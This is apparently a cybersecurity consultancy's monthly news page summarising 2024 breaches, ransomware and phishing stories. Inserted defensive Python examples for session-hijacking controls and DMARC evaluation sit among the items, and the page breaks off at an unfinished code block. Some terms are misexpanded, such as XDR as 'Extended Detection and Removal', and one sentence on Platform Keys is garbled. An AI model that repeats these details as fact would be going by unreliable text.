BREAKING NEWS and LESSONS LEARNED

Cybersecurity changes faster than you can read about it. This page covers news, comments and lessons learned from around 10 of the 7000+ stories each month.

Dec 2024 Headline News: Updated December 2nd
#137 Amazing New Cybersecurity Methodology… To be clear, this is our new cybersecurity methodology, which might not actually be amazing but which addresses the issues that all the super-expensive, IT-oriented methods and products simply miss, causing chaos. Check out our new multi-layer cybersecurity model just published in this month’s ISE magazine. Read all about it at cybyr.com/10layers. It certainly is news for us; it builds on lessons learned and Zero Trust best practices and is our most thoroughly thought-through piece of work since we began this journey.
News on Critical Infrastructure incidents is also tracked on the Critical Infrastructure page.  Click here to subscribe to our news update service delivered via email.

Some stories need a closer, more controversial look.

  • NaaS: A room full of elephants
  • GenAI: Show me the intelligence
  • National Public Data’s exposure of 3bn personal info items now holds the record. Privaterecords (MC2) is a close 2nd.
  • Crowdstrike/Microsoft: The biggest IT disaster of all time? Estimated at a cost of $5.4bn.
  • Did AT&T open Pandora’s Box?
  • NIST’s Cybersecurity Framework has been lauded. We explain why we have a very different view to others about this.
  • How and why the Securities and Exchange Commission is attempting to bring accountability globally
  • The now infamous breach of the MGM hotel chain shows what happens when you don’t implement holistic cybersecurity.
November 2024 Headline News: 
#136 To end the month … It’s all too easy to get overwhelmed by the constant stream of new threats. We’ll end this month with the report that Russian threat actors have been planting malware via a site you merely visit and then leave, using an exploit in Firefox’s browser in combination with an escalation-of-privilege bug in Windows 10 and 11. The vulnerabilities have been fixed, as reported by SentinelOne, which says that neither company (Mozilla nor Microsoft) was aware of the problem or of the adversary’s use of an APT to plant malware in end-user systems. The only lesson to be learned, it seems, is to use anti-malware software to prevent accidental (or otherwise) visits to malicious sites where such zero-touch traps lie in wait.
#135 Here’s a Shocker Cybersecurity Insider’s new study of 417 companies showed that only 17% did not have an insider attack this year. That means 83% did! A massive uptick from 2023. The attacks are no doubt attributable to more sophisticated phishing scams, credential theft, etc., rather than to an increase in employees’ criminal intent. The report makes interesting reading.
#134 Even the Security Software “Leaders” are not immune Following the entry below, one of the largest security software vendors is clearly not up to speed with DevSecOps. A significant zero-day breach of Palo Alto Networks software reportedly compromised more than 2,000 deployed firewall products. It was reported by NIST as CVE-2024-0012 and CVE-2024-9474. One report even said that there were developer comments in the code questioning the veracity of the code. Whatever the actual situation, the lesson remains the same as in the incident below: there have to be some checks and verification done, whether internally or in collaboration with top customers. The days of simply trusting suppliers have to be put in the past.
#133 Hey, This Coffee Tastes of Malware! As you likely saw in the mainstream news, once again a company providing software to many organizations was hacked. Starbucks was forced to pay its baristas manually because of a ransomware attack on third-party software from Blue Yonder, an Arizona-based cloud services provider. This also affected many of the top grocery stores in both the U.S. and the U.K. using their software. Jumping to conclusions, the likely explanation is that they didn’t do the basics or deploy at least some level of threat detection and removal software. This type of attack scales to affect many companies, taking advantage of poor software supply chain discipline and the abdication of responsibility by its customers/clients, as we covered here: https://cybyr.com/delegation/.
#132 Phocus on Phishing As reported by MSN, Microsoft’s Digital Crimes Unit has seized 240 fraudulent sites used by the PhaaS (Phishing as a Service) platform ONNX to sell phishing templates that have generated millions of phishing attacks. In other phishing news, The Cyberguy reports a scam in which many are being taken in by official-looking emails from what appears to be Apple.
#131 Dark Clouds Looming All sorts of rumors are spreading through the U.S. Government security community ahead of the new regime including the upcoming resignation of Jen Easterly – head of CISA – and the upcoming surge of Russian threat actors. More to follow …
#130 Small to Medium Businesses Under Increasing attack. KnowBe4 just reported the staggering and completely unsurprising news that more than half of all ransomware attacks this year have been on small businesses. The attacks increase and yet not nearly enough is being done to address this! Maybe reading my “Cybersecurity For Small & Medium Organizations” would be a good place to start!
#129 Security Defense Software Targeted People who purchase cybersecurity software obviously have something to defend, right? Why else would anyone invest the money, unless the cost of a potential ransomware attack would be crippling? This is all an intro to an unsurprising report of security software companies being the target of cyberattacks. A report from SecurityDive says that “Zero-days from the top security vendors were the most exploited CVEs.” Five well-known companies, and obviously their customers, were targeted. That report was based on 2023 data, but a new report shows it’s still happening today, with Palo Alto Networks’ customer migration tool hit by a trio of CVE exploits.
#128 Phishing A new report published by MSN shows that a massive increase in AI-based phishing is resulting in companies being barraged by phishing attacks that are defeating Secure Email Gateways (SEGs) and native defenses like Microsoft 365’s security features.
#127 Critical Infrastructure Focus Many news items have brought Critical Infrastructure to the fore this month. Halliburton, a global provider of products and services to the energy industry, reported losses of $35m to the SEC after a ransomware attack took down systems of the $23bn-revenue company. Healthcare attacks continue to escalate according to government warnings in a new report in Government Info Security. The increase in healthcare attacks bucks the trend in other industries, as reported in a Sophos report covered here. Even German pharmaceutical wholesalers didn’t escape. In the US, the Transportation Security Administration (TSA) has unveiled a long-awaited proposal for cybersecurity mandates for pipelines and railroads, covered in the article by Meritalk. Finally, the latest story mid-month is of Iranian attacks on the airline industry with a phishing/APT attack promising dream jobs to the cybersecurity-unwashed masses.
#126 Advice to Lawyers Having heard many stories regarding breaches at legal firms, I was not surprised when I read this article. It typifies many market sectors that get superficial advice on some actions to take but almost no help on implementation or on the scope of work required to protect an organization. I include this article from Above the Law not to criticize this particular, well-intentioned piece but as an example of how much more is required to minimize risk. A radically different approach will be published in a few weeks and continued on this site. Watch this space.
#125 Arrests follow Seizure of 22,000 Malicious IP addresses A breach of cloud storage company Snowflake led to the theft of credentials from 165 major organizations. Snowflake announced that it will enforce MFA and strong passwords. Great – a bit late now. Shame they didn’t act ahead of this. However, a new Interpol operation resulted in 41 arrests and the takedown of 22,000 malicious IP addresses. Read more in this week’s report from SentinelOne.
#124 Ascon Encryption Progress Twenty months after the initial selection of a new lightweight encryption methodology for IoT and IIoT devices, NIST announced the first draft standard based on Ascon. This will be an important step in the protection of devices used in healthcare, ICS and all manner of Critical Infrastructure, OT and non-IT systems.
#123 Panic over It turns out that there were no serious election day issues caused by cybersecurity breaches – other than the odd fake bomb threat attributed to Russians – unless somehow all the voting systems or counting systems were penetrated before they were disconnected from the internet. That would have been tough because every state had its own system of voting and collecting and counting. A strange but effective defense, it seems.
#122 Panic in the Streets Election nerves in the U.S. are affecting most of the U.S. population, creating the right atmosphere for all manner of fakes, phishing and cybersecurity attacks. Whatever the result, threat actors are exploiting all opportunities to disrupt before and cause chaos after the election – with examples in the last week of October.
October 2024 Headline News: 
#121 Holistic Cybersecurity attacks These two instances were examples of attacks beyond the walls of the IT department, impacting web presence, which is usually managed by marketing companies or outsourced by SMBs. The first shows the dangers of using WordPress plug-ins. There are 50,000 of these, and they are largely unsupervised and casually used by unsuspecting website managers. Bleeping Computer’s article shows how 6,000 websites were affected by just one of these fake plugins! Web hosting companies aren’t immune either. Another software company, CyberPanel (web hosting control panel software), used by hosting companies such as DigitalOcean, was compromised, impacting 22,000 sites – as also revealed by Bleeping Computer in a separate article. These are not one-off instances – they are frequent occurrences. The lessons to be learned here are: implement the hosting site’s firewall software, minimize the use of plugins to, as the first article states, well-known reputable plugins and, as in #119 below, validate all third-party supply chain companies and their products. (End of rant.)
#120 As If the separation in the US wasn’t bad enough … Jen Easterly (Director of CISA) describes in a PBS interview the Russian, Iranian and Chinese frauds and scams aimed at undermining US election credibility and fueling discord. She explains that the electoral system is much more robust than four years ago.
#119 Supply Chain Risk Management. Security company Crowdstrike’s regression testing lapse was not a security software company breach – but these two were. ArcticWolf reported that SonicWall firewalls were the initial access point for 30 Akira ransomware attacks. Fortinet disclosed two vulnerabilities. One, listed by CISA and covered by SentinelOne as CVE-2024-47575 – a protocol error between two Fortinet security products using unauthorized APIs – reportedly affected 50 customers. The news is hardly news, since it happens often. The question is why cybersecurity companies, who should be the most vigilant, seem so weak at creating their own products free from weaknesses, or at recognizing the same faults that hackers, who don’t have the same access to the code, are able to find. Perhaps the attackers are just smarter?
#118 It’s all about protecting the assets. Finally making the news is coverage of protecting data as the prime organizational concern. Specifically, the stewarding of assets (data, software, intellectual property and all electronic valuables) offline is vital, since the backup of such information is the first target of ransomware threat actors. This new article from Data Center Knowledge is the first to cover offline storage, a critical topic.
#117 Cybersecurity Awareness Month Awareness is a key defense. It’s the necessary opposite of “Cybersecurity? We sorted all that out last year”. A new article from SentinelOne lists the top 26(!) current ransomware attack types and reminds readers that the increasing types and scope of ransomware are a cautionary tale to remain vigilant – and yes, it includes a pitch for their products to provide defense, but it makes an interesting read. Our contribution to Cybersecurity Awareness Month can be found on the cyberpedia page on this site. New additions cover the steps of Advanced Persistent Threat attacks, and details of MITRE attack techniques are described. Finally, in preparation is an addition to this site covering detection and defense against ransomware in wide area network services when breaches occur.
#116 Living-off-the-Land Having just written a paper on ransomware detection after a breach has occurred in the network, this article caught my attention. A new attack (OilRig) has been exploiting a Windows kernel vulnerability (CVE-2024-30088) to target Exchange servers for credential theft, escalate privilege and allow remote code execution. This ploy of infiltrating standard system software, known as a Living-off-the-Land attack, is a typical element of an Advanced Persistent Threat attack. More on this story soon.
#115 Cybersecurity Awareness Month Lurches on Perhaps it should be renamed Ransomware Month, with reports of ransomware attacks on Veeam (backup systems), infected thumb drives being slipped into air-gapped systems and many healthcare attacks accounting for a 68% increase in first-half losses. The question is, what lessons can be learned? Increasingly sophisticated Phishing as a Service employs several different penetration attacks at the same time (social engineering, email and AI-based phishing, identity theft with new Adversary-in-the-Middle (AiTM) attacks). Once inside, the attackers both exfiltrate data and then encrypt data and software. I.e. the lesson is that all defenses must be strengthened – just doing one or two does not cut it.
#114 30% Increase in Numbers of Ransomware Groups and Attacks The number of ransomware groups grew annually by 30%. A detailed and impressive new report by Secureworks identifies the top ransomware groups and how they are using new techniques for identity theft, etc. Not only are they growing in numbers, but they are collaborating and organizing as they share increasingly sophisticated strategies. All this is despite the increased availability of defense tools. Links: Secureworks news release and Infosecurity article. In a related article, ITPRO just reported 450 new ransomware attacks in August – a 14% jump from July. The article also names the threat actors concerned and shows year-over-year changes.
#113 US Telcos under attack Unconfirmed by AT&T, Lumen and Verizon, and denied by Chinese authorities, the Wall Street Journal reported that a coordinated and concerted attack by Chinese attackers, using an Advanced Persistent Threat (APT) known as Salt Typhoon, had systematically attacked top U.S. telcos. Targeted were court-authorized wiretaps! If that wasn’t bad enough, the larger concern is the potential vulnerability of all national and international communication systems. The ability to combat these attacks is hampered by the limited number of defenders vs. attackers. This link is to the CNN report.
#112 AI Networking Just published is our new article on AI Networking. This developing story begins here.
#111 Do you recall Recall? As you may remember, Microsoft’s guardian angel Recall was recalled after the furor about having Big Brother watching your every step as part of their new Copilot laptops and Windows 11 software, whether you liked it or not. For those not following, every action and site visited is tracked and saved “just in case you need it.” It comes with a potentially high risk of intrusion and cyber-exploit. Undaunted, a new opt-in version is being relaunched. My concern is that those who are less security aware, or generally naive, will have their entire life exposed. History is not on Microsoft’s side. I will not be opting in.
#110 MFA Vulnerabilities Like all other defenses, MFA has its vulnerabilities. HelpNetSecurity revealed last week how session hijacking can infiltrate user-web transactions and create an MFA bypass that is becoming a critical security and ransomware issue. Session hijacking is where legitimately authenticated users have their valid session ID impersonated by threat actors. The Descope website does a nice job of describing it and suggests ways to prevent it.
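To make the session-hijacking risk concrete from the defender’s side, here is an added Python sketch (it is not code from HelpNetSecurity, Descope or this site) of a server-side session store that applies the controls that limit what a stolen session ID is worth once MFA has been passed: unguessable IDs, rotation of the ID at the moment of authentication, idle and absolute timeouts, cookie flags that keep the ID off plain HTTP and out of page scripts, and revocation the moment the ID is presented from a different client. The timeouts, the `__Host-sid` cookie name and the fingerprint scheme (User-Agent plus the first three IPv4 octets) are assumptions for the example.

```python
"""Added example: server-side session handling that blunts session hijacking.
Not from HelpNetSecurity, Descope or the original page; timeouts, cookie name
and the fingerprint scheme are assumptions chosen for illustration."""
import hashlib
import secrets
import time
from dataclasses import dataclass
from http.cookies import SimpleCookie

IDLE_TIMEOUT = 15 * 60        # seconds without activity before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime regardless of activity


def client_fingerprint(user_agent: str, ip: str) -> str:
    """Coarse client binding: User-Agent plus the first three IPv4 octets."""
    net = ".".join(ip.split(".")[:3])
    return hashlib.sha256(f"{user_agent}|{net}".encode()).hexdigest()


@dataclass
class Session:
    user: str
    fingerprint: str
    mfa_done: bool
    created: float
    last_seen: float


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def create(self, user, fingerprint, now=None):
        """Pre-authentication session with a 256-bit random ID."""
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, fingerprint, False, now, now)
        return sid

    def complete_mfa(self, sid, now=None):
        """Rotate the ID when privilege changes, so an ID captured before
        MFA (e.g. by a phishing proxy) no longer maps to anything."""
        now = time.time() if now is None else now
        old = self._sessions.pop(sid)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = Session(old.user, old.fingerprint, True, old.created, now)
        return new_sid

    def validate(self, sid, fingerprint, now=None):
        """Return (ok, reason). Any failure revokes the session so that a
        replayed cookie cannot be retried from another client."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None:
            return False, "unknown_session"
        if now - s.created > ABSOLUTE_TIMEOUT:
            reason = "absolute_timeout"
        elif now - s.last_seen > IDLE_TIMEOUT:
            reason = "idle_timeout"
        elif s.fingerprint != fingerprint:
            reason = "fingerprint_mismatch"   # likely replay of a stolen cookie
        else:
            s.last_seen = now
            return True, "ok"
        del self._sessions[sid]
        return False, reason


def session_cookie_header(sid: str) -> str:
    """Set-Cookie value with the flags that keep the ID off plain HTTP
    (Secure), away from page scripts (HttpOnly) and out of cross-site
    requests (SameSite=Strict); the __Host- prefix also pins it to this host."""
    c = SimpleCookie()
    c["__Host-sid"] = sid
    c["__Host-sid"]["secure"] = True
    c["__Host-sid"]["httponly"] = True
    c["__Host-sid"]["samesite"] = "Strict"
    c["__Host-sid"]["path"] = "/"
    return c.output(header="").strip()


if __name__ == "__main__":
    store = SessionStore()
    victim = client_fingerprint("Mozilla/5.0", "203.0.113.10")     # constructed
    attacker = client_fingerprint("curl/8.0", "198.51.100.7")      # constructed
    sid = store.complete_mfa(store.create("alice", victim))
    print("victim:", store.validate(sid, victim))
    print("replayed from elsewhere:", store.validate(sid, attacker))
    print("victim again:", store.validate(sid, victim))
    print(session_cookie_header(sid))
```

Binding a session to a client fingerprint is a trade-off: mobile users change networks and browsers update their User-Agent, so the mismatch path above forces a fresh login rather than quietly letting the request through. The rotation in `complete_mfa` is the piece that specifically addresses the MFA-bypass scenario: an ID captured before the second factor is worthless after it.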
 
September 2024 Headline News: 
#109 Are those Clouds safe? Lurking inside those comforting clouds, all may not be well. Microsoft’s latest intelligence blog warned that the Storm-0501 threat actor’s latest ploy is to access Microsoft’s Entra ID cloud accounts and use lateral movement to cause disruption. More on this in The Register’s article on the topic.
#108 Behind the front lines of the Cyberwar Revealed at the end of September was that Chinese state-linked hacker attacks have since May been accessing email accounts at around 25 organizations, including the U.S. Commerce and State Departments. What was contained in the 60,000 emails that impacted 25 departments was not revealed, but one can only imagine how strategies and physical defense initiatives could be compromised and lives put at risk. However, this form of attack sounds much cheaper than infiltrating those departments with actual physical spies.
#107 MC2 Private Data breached Similar to last month’s breach at NPD, detailed personal data – to the tune of 100m+ individuals – was lost by background check company MC2 (website privaterecords.net). See the in-depth report in The Blog.
#106 SeaTac Dilemma Lessons not yet learned – we can only guess. Almost one month after the breach at Seattle-Tacoma International Airport (SeaTac) we are none the wiser about the cause of the breach. Of course, nothing was revealed at the mid-September Senate hearing. Yes, there is speculation about what data was stolen and published on the Dark Web, and we hear that the $6m ransom is not being paid (a good thing). What we don’t know is which of their many systems were compromised or how it was done. We don’t know what threat detection systems have been deployed, if any, or which security software was used. We really hope that there was some Extended Detection and Removal (XDR) software and that it was not compromised. XDR is most important since it follows Zero Trust’s “Assume Breach” to look for lateral movement, etc. Of course, we don’t know how the initial breach happened, anything about their data and software management, or how it could impact other airport systems worldwide. Two other detection and response software tools are also available: Network Defense and Response (NDR) and Cloud Detection and Response (CDR) software, for detecting exploits within a network or cloud system following a breach. As announced by the Department of Transport: “Cybersecurity is a safety issue.” It’s appropriate that SeaTac not disclose any of this publicly, or even to other airport organizations, for sound security reasons, but it makes it very hard to even guess what specific lessons can be learned. This lack of shared intelligence weakens everyone’s defenses. Any delay in fixing and deploying any actual software, system or device problems must make the attackers’ job easier.
#105 CISA aligns civilian cybersecurity strategy.

In a surprising development, CISA appears to have adopted cybyr.com’s principal approaches to cybersecurity. Or, to put it another way, CISA continues to provide sound guidance that we would agree with. The five priority areas for Federal Civilian Executive Branch (FCEB) agencies are:

  1. Asset management (a little generic)
  2. Vulnerability management (perhaps light on departmental vulnerabilities)
  3. Defensible architecture (including applying Zero Trust principles)
  4. Cyber supply chain risk management (following validation best practices)
  5. Incident detection and response.

Although targeting FCEBs the principles apply anywhere. Download the report from the CISA website.

#104 Two new in-depth blogs Two highly topical issues: AI and Network as a Service are covered in two new blogs on this site. The AI topic reflects on the implied intelligence of GenAI compared to earlier AI products. The NaaS piece looks at some of the issues that could prevent the new iteration of networking becoming the next big thing.
#103 Park here at your own risk. If you’ve ever parked at one of those unmanned city parking lots that require you to pay by going to a website, then you are in for a choice of special treats. You can either go to their unofficial and potentially infected website and pay a bunch of spurious fees, or use your phone to scan the QR code, which could have been put up by anyone, and have your personal data stolen via a “quishing” attack, or you can find a better place to park.
#102 Mind the gap As an advocate of air gapping of critical data, software and all critical asset information, this story is sobering. For those creating a virtual air gap between IT and Operational Technology networks, the same may apply. This also relates to deploying properly certificated device drivers in all systems. It turns out that a threat exists whereby malware in device drivers loaded into such systems can exfiltrate stored encryption keys, biometric info, etc., using electromagnetic waves! Another method involves the use of infected flash drives attached to air-gapped systems. I.e. the bottom line is that it is not sufficient to isolate backup systems from wireline and wireless communications; you also have to be aware of all potential breaches, such as this sci-fi style attack. Such attacks are not just theoretical but have actually happened. This story was reported by Steve Gibson in this week’s Security Now podcast. More details on page 14 of his weekly notes.
#101 Don’t tap your picture A “dangerous” Android phone exploit discovered by McAfee and covered in a story by Forbes downloads fake apps disguised as one of 280 genuine apps. This results in access to your photos – dangerous in itself for any number of phishing attacks – but more immediately it targets stored 12-word pass-phrases used to access crypto wallets. Google is working on a fix for the issues, but for now don’t click on a message that has you and your friend in a picture. (Yikes!)
#100 How low will they go? Our 100th story of the year sets new lows for hackers. In London, Forbes reported that “despicable” hackers held disabled bus users to ransom and SC Magazine reported that Montana healthcare Planned Parenthood services had also been held to ransom. However, rather than jumping to a moral judgment, the phrase “it’s only business” comes to mind since the reason for the existence of hacker organizations is financial rather than even political. (It still sucks.)
#099 Ransomware groups up, victims down. Security Magazine reported that the first half of 2024 saw a 56% increase in the number of ransomware groups compared to the same period of 2023. Actual victims were down slightly. The article attributes the decrease in victims to law enforcement efforts. The lesson to be learned is that threats are constantly changing, and keeping aware of the changes is an almost daily task. The trend also shows that the use of Ransomware as a Service has become the norm for the delivery of Advanced Persistent Threat (APT) attacks. These are problematic because they include difficult-to-defend lateral movement elements that explore vulnerabilities in your system.
About APTs and XDR The most important defense against the Ransomware as a Service that enables APTs is provided by Extended Detection and Removal (XDR) software. It’s important because when all other defenses fail and a breach has occurred, this is the only systematic detection and removal mechanism available, but it is not currently clear how effective these tools are or which ones to choose. More on this separately, including a list of software choices. One of those companies (Barracuda) produced an interesting report showing that 44% of ransomware attacks included lateral movement. Other detected activity included suspicious file changes in a network or system. The effectiveness of XDR is clearly a very important topic since it acts as a backstop when all other defenses have been breached. As Zero Trust states: “Assume Breach.”
#098 Collaboration or passing the buck? We are promised that the outcome of the Microsoft cybersecurity event (September 10th) relating to the Crowdstrike incident will be made public. You know, the one where the whole world was exposed by a lack of regression testing by Crowdstrike and a lack of product verification by Microsoft. The Band-Aid being discussed is how software that currently requires “Privileged Kernel Mode” could achieve the same results by operating in “User Mode.” Apart from not addressing the root cause of the problem mentioned above, this would possibly contravene an EU ruling and would favor those companies (i.e. Microsoft) who are able to write apps in privileged mode. In fact, Microsoft already has a competitive product that it sells. More to follow, and also see the In-depth write-up.
#097 Will they ever learn? It is astonishing that supposedly responsible companies still can’t do the zero-cost cybersecurity basics. According to Bloomberg Law, Communication Federal Credit Union’s “reckless” cybersecurity practices led to a January data breach. They failed to follow basic practices such as installing anti-malware software, performing regular audits and implementing multifactor authentication, despite public statements to the contrary.
Aug 2024 Headline News. The worst month ever? Of 10,000 posted, here are another 100+ stories
#096 Using Chrome to store your passwords? If the answer is yes, then you are a target. Cybernews revealed that the Qilin ransomware group are the culprits. Those who store passwords in Chrome (which has 65% market share) have 87 passwords stored on average. Time to use one of those intrusive password managers or passkeys. Pick one that hasn’t been hacked.
#095 “Here’s your room key, sir.” “No, I don’t need it.” An insidious back door in RFID key cards means that there is simple access to hotel room key and many other card access systems worldwide. The culprit is the Chinese manufacturer, who has marketed this as a new and more secure system when actually it seems to have deliberately left a back door in the system that is easy to exploit. Security Now (see page 2) revealed that threat actors can clone the smart key cards and gain access to commercial and military targets.
#094 Your Contactless Payment may be your last. Reported by The Hacker News, a new malicious application installed on an Android phone can send contactless card information with the intention of conducting fraudulent transactions. The “NGate” software is installed via social engineering, not via the Google Play Store. See the article for further info, though the exact details, prevention and cure are not included. However, disabling NFC (Near Field Communication) on your phone via Settings > Connected devices and toggling NFC off will disable the function that the malware uses.
#093 Downloading Movies from the Internet? Think again. A nasty new exploit was discovered by Mandiant and reported in another article by The Hacker News. Search for videos online and you come across a supposedly pirated movie that you can download. New embedded malware gets downloaded by sophisticated dropper software and the resulting code is executed. The article documents step by step the highly detailed process. Lesson learned: just don’t do it.
#092 Government Oversight Testing the Water By filing a federal complaint accusing Georgia Tech of failing to meet cybersecurity requirements, the DOJ is likely testing the water on its ability to enforce cybersecurity regulations. Whether it wins or loses the case is likely less important than the lessons that will be learned. It claims that the Georgia Institute of Technology failed to follow adequate security for sensitive government information. I.e. it’s taking steps related to information that it is responsible for, perhaps without having properly validated that the protection was being enforced. Details here.
#091 Disastrous loss of our identities. National Public Data – a service provided by Jericho Pictures of Florida – revealed that almost 3 billion personal data records have been hacked, including full names, addresses, SSNs in plain text and 130 million unique email addresses. This is easily the biggest theft of personal data of all time. The story continues on our In Depth page.
#090 Post-Quantum Encryption Breakthrough NIST just announced that it has released a final set of encryption tools designed to withstand attack by a quantum computer. These tools have the potential to prevent the disastrous decryption of most modern asymmetric encryption systems, which are central to the privacy and secrecy of most financial, security, government and personal network-based communications. NIST has finalized its principal set of encryption algorithms designed to withstand such cyberattacks and is encouraging computer system administrators to begin transitioning to the new standards as soon as possible.
#089 Phishing and Ransomware out of control? More than 300 ransomware, breach, phishing and cybersecurity stories appeared on August 11th alone (including the hacking of Trump’s email). This represents a significant uptick over previous levels, yet still small and medium size organizations think it won’t happen to them. See #086 below.
#088 No rush to Pay Ransomware According to security firm Semperis, 74% of companies attacked by ransomware are then attacked multiple times, and 78% paid the ransom. Like missing a bus, don’t worry, another attack will be along shortly. (Good grief! It’s clearly going to be a challenge to cover only 10 stories this month with a slew of healthcare and farming attacks.)
#087 DMARC Bypass Attack Security Magazine reports on a Darktrace study finding that 62% of phishing emails – of the 17.8m they analyzed – were able to bypass the Domain-based Message Authentication, Reporting and Conformance (DMARC) checks that have been designed exactly to prevent this problem.
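To make clear what a DMARC check does and does not stop, here is an added Python example (not code from Darktrace, Security Magazine or this site) that implements the core of RFC 7489: policy discovery for the From-header domain and the strict/relaxed identifier alignment of SPF and DKIM results. The DMARC records, domains and authentication results are constructed, the record is supplied directly rather than fetched from DNS, and the organizational domain is approximated as the last two labels instead of consulting the Public Suffix List; all of those are assumptions for the example.

```python
"""Added example: minimal DMARC policy evaluation (RFC 7489 core logic).
Not from Darktrace, Security Magazine or the original page. Records, domains
and results below are constructed; no DNS lookups are performed and the
organizational-domain rule is a last-two-labels approximation."""
from dataclasses import dataclass

# Constructed DMARC TXT records, keyed by domain (would normally be fetched
# from _dmarc.<domain>). The second entry is a lookalike domain that a phisher
# has registered and configured correctly.
CONSTRUCTED_DMARC_RECORDS = {
    "example.com": "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; rua=mailto:dmarc@example.com",
    "examp1e.com": "v=DMARC1; p=none",
}


def parse_dmarc_record(txt: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict, applying RFC 7489 defaults."""
    tags = {"adkim": "r", "aspf": "r"}          # relaxed alignment by default
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    tags.setdefault("sp", tags["p"])            # subdomain policy defaults to p
    return tags


def org_domain(domain: str) -> str:
    """Approximation: last two labels (real receivers use the Public Suffix List)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Identifier alignment: strict needs an exact match, relaxed an org-domain match."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


@dataclass
class AuthResults:
    spf_result: str     # "pass" / "fail" / "none"
    spf_domain: str     # RFC5321.MailFrom domain that SPF evaluated
    dkim_result: str
    dkim_domain: str    # d= tag of the DKIM signature that verified


def dmarc_disposition(from_domain: str, auth: AuthResults,
                      records=CONSTRUCTED_DMARC_RECORDS):
    """Return (result, disposition) for a message whose RFC5322.From is from_domain.
    result is 'pass', 'fail' or 'none'; disposition is the action the policy requests."""
    # Policy discovery: exact From domain first, then its organizational domain.
    txt = records.get(from_domain.lower())
    is_subdomain = False
    if txt is None:
        txt = records.get(org_domain(from_domain))
        is_subdomain = txt is not None
    if txt is None:
        return ("none", "none")                 # no DMARC record: nothing to enforce
    policy = parse_dmarc_record(txt)
    spf_ok = auth.spf_result == "pass" and aligned(from_domain, auth.spf_domain, policy["aspf"])
    dkim_ok = auth.dkim_result == "pass" and aligned(from_domain, auth.dkim_domain, policy["adkim"])
    if spf_ok or dkim_ok:                       # either aligned mechanism is enough
        return ("pass", "none")
    return ("fail", policy["sp"] if is_subdomain else policy["p"])


if __name__ == "__main__":
    cases = {
        "legitimate mail from example.com":
            ("example.com", AuthResults("pass", "bounce.example.com", "none", "")),
        "exact-domain spoof of example.com":
            ("example.com", AuthResults("pass", "evil.net", "none", "")),
        "subdomain spoof with strict DKIM alignment":
            ("hr.example.com", AuthResults("fail", "evil.net", "pass", "example.com")),
        "phisher's own lookalike domain":
            ("examp1e.com", AuthResults("pass", "examp1e.com", "none", "")),
    }
    for name, (dom, res) in cases.items():
        print(f"{name}: {dmarc_disposition(dom, res)}")
```

The last case is the one that explains a high bypass rate: DMARC only protects the exact domain in the From header. A phisher who registers a lookalike domain and publishes valid SPF, DKIM and DMARC for it passes cleanly, as does mail from a compromised mailbox at a legitimate domain, so DMARC needs to be paired with lookalike-domain monitoring, display-name checks and user-facing warnings rather than relied on alone.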
#086 Breakthrough in SMB Cybersecurity This is my modest title for our new methodology for small and medium businesses that have no budget, expertise or resources, while also having a massive lack of awareness that they are at risk. My just-published ISE article and web page are accompanied by a September 19th workshop and implemented with the new Virtual CSO Service. Our transformative purpose is clear: “Every small and medium size organization is protected from attack.”
#085 Why didn’t they do that sooner? With so many ransomware attacks, even this week’s theft of three terabytes of Columbus, Ohio employee personal information – supposedly stolen and put up for auction – would not warrant a mention here. However, the proposed bill from the Senate Intelligence Committee would elevate such crimes to a terrorism threat. Perhaps that would not be a deterrent to the threat actors, but it could not only dramatically increase the powers of response but also raise the realization among all organizations that we are actually at war – an undeclared one – with nations who sponsor the exploitation. The question could also be: “With all of the Russian, North Korean and Chinese-based threat actors, why on earth wasn’t this done earlier?” Cyberscoop’s article goes into the ramifications but does not cover how it might impact an organization’s cybersecurity insurance, which could respond differently to “acts of terrorism” (or war). Columbus Footnote: Two Columbus police officers filed a class action lawsuit against the city, with bank accounts likely compromised and 200,000 employees’ information being made public. (Good Grief!)
#084 Microsoft Phishing Defense – A False Sense of Security? Anti-phishing software has become a pillar of today’s defenses. However, having flawed protection is worse than I having none – because you rely on it and are less cautious. Infosecurity magazine reported this week that ” a vulnerability in Microsoft 365’s anti-phishing mechanisms, can be exploited using CSS allowing attackers to bypass safety alerts, raising concerns about the  Microsoft’s phishing defenses.”
#083 AI and Cybersecurity Will the AI bubble burst? Will the world get that maybe it should be called Artificial Unintelligence, since it is not really applying actual human intelligence? Will enterprises figure out how to create useful Large Language Models from all their legacy and dispersed data? Most have not yet. Then there’s lots of smart hackers trying to leverage all of this. Or will all of the baby steps in GenAI get sorted out and we’ll get something that’s usable because if they can then there’s the promise of something transformational. Given that protection is a key issue, CISA just appointed its first Chief AI Officer, Lisa Einstein to oversee the secure development and adoption of AI across the United States. There will be much more on AI in networking and cybersecurity on this site as it progresses.
#082 Here come the suits – the law suits that is. Crowdstrike’s loss of market value of $25bn following the release of poorly tested software has led to the first of likely several law suits representing the shareholders and citing various wrongdoings and misleading statements. I am aware that the “incident” clocked up at least $5.4bn of losses (Delta airlines alone said it cost them half a billion).  However, it seems that likely one process or coding mistake should not bring down an otherwise reputable company with good support and valuable protection to its customers – especially when others shared the responsibility.
#081 Platform Key Vulnerability We all scoff at users who don’t change their default username and password (e.g. username: user, password: password). What we don’t expect is that for years, PC manufacturers have been shipping products with a Platform Key with the key “Do Not Ship” and “Do Not Trust.” This week Binarly (developers of a risk intelligence platform) revealed that most of the industry’s PC shipments have had their security compromised. Platform Key is the Secure Boot master key on which Secure Boot depends. First discovered in 2012, products, yet today are still being shipped with the same key.
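The practical question for an administrator is simply “is my PK one of those test keys?”. Below is an added example (mine, not from the original page or from Binarly) that answers it on a Linux host with efivarfs mounted. The variable path is the standard PK under the EFI global variable GUID; the marker strings are the ones the page quotes, and they are a positive-only indicator (a PK without them could still be some other leaked or weak key). Run it as root.

```python
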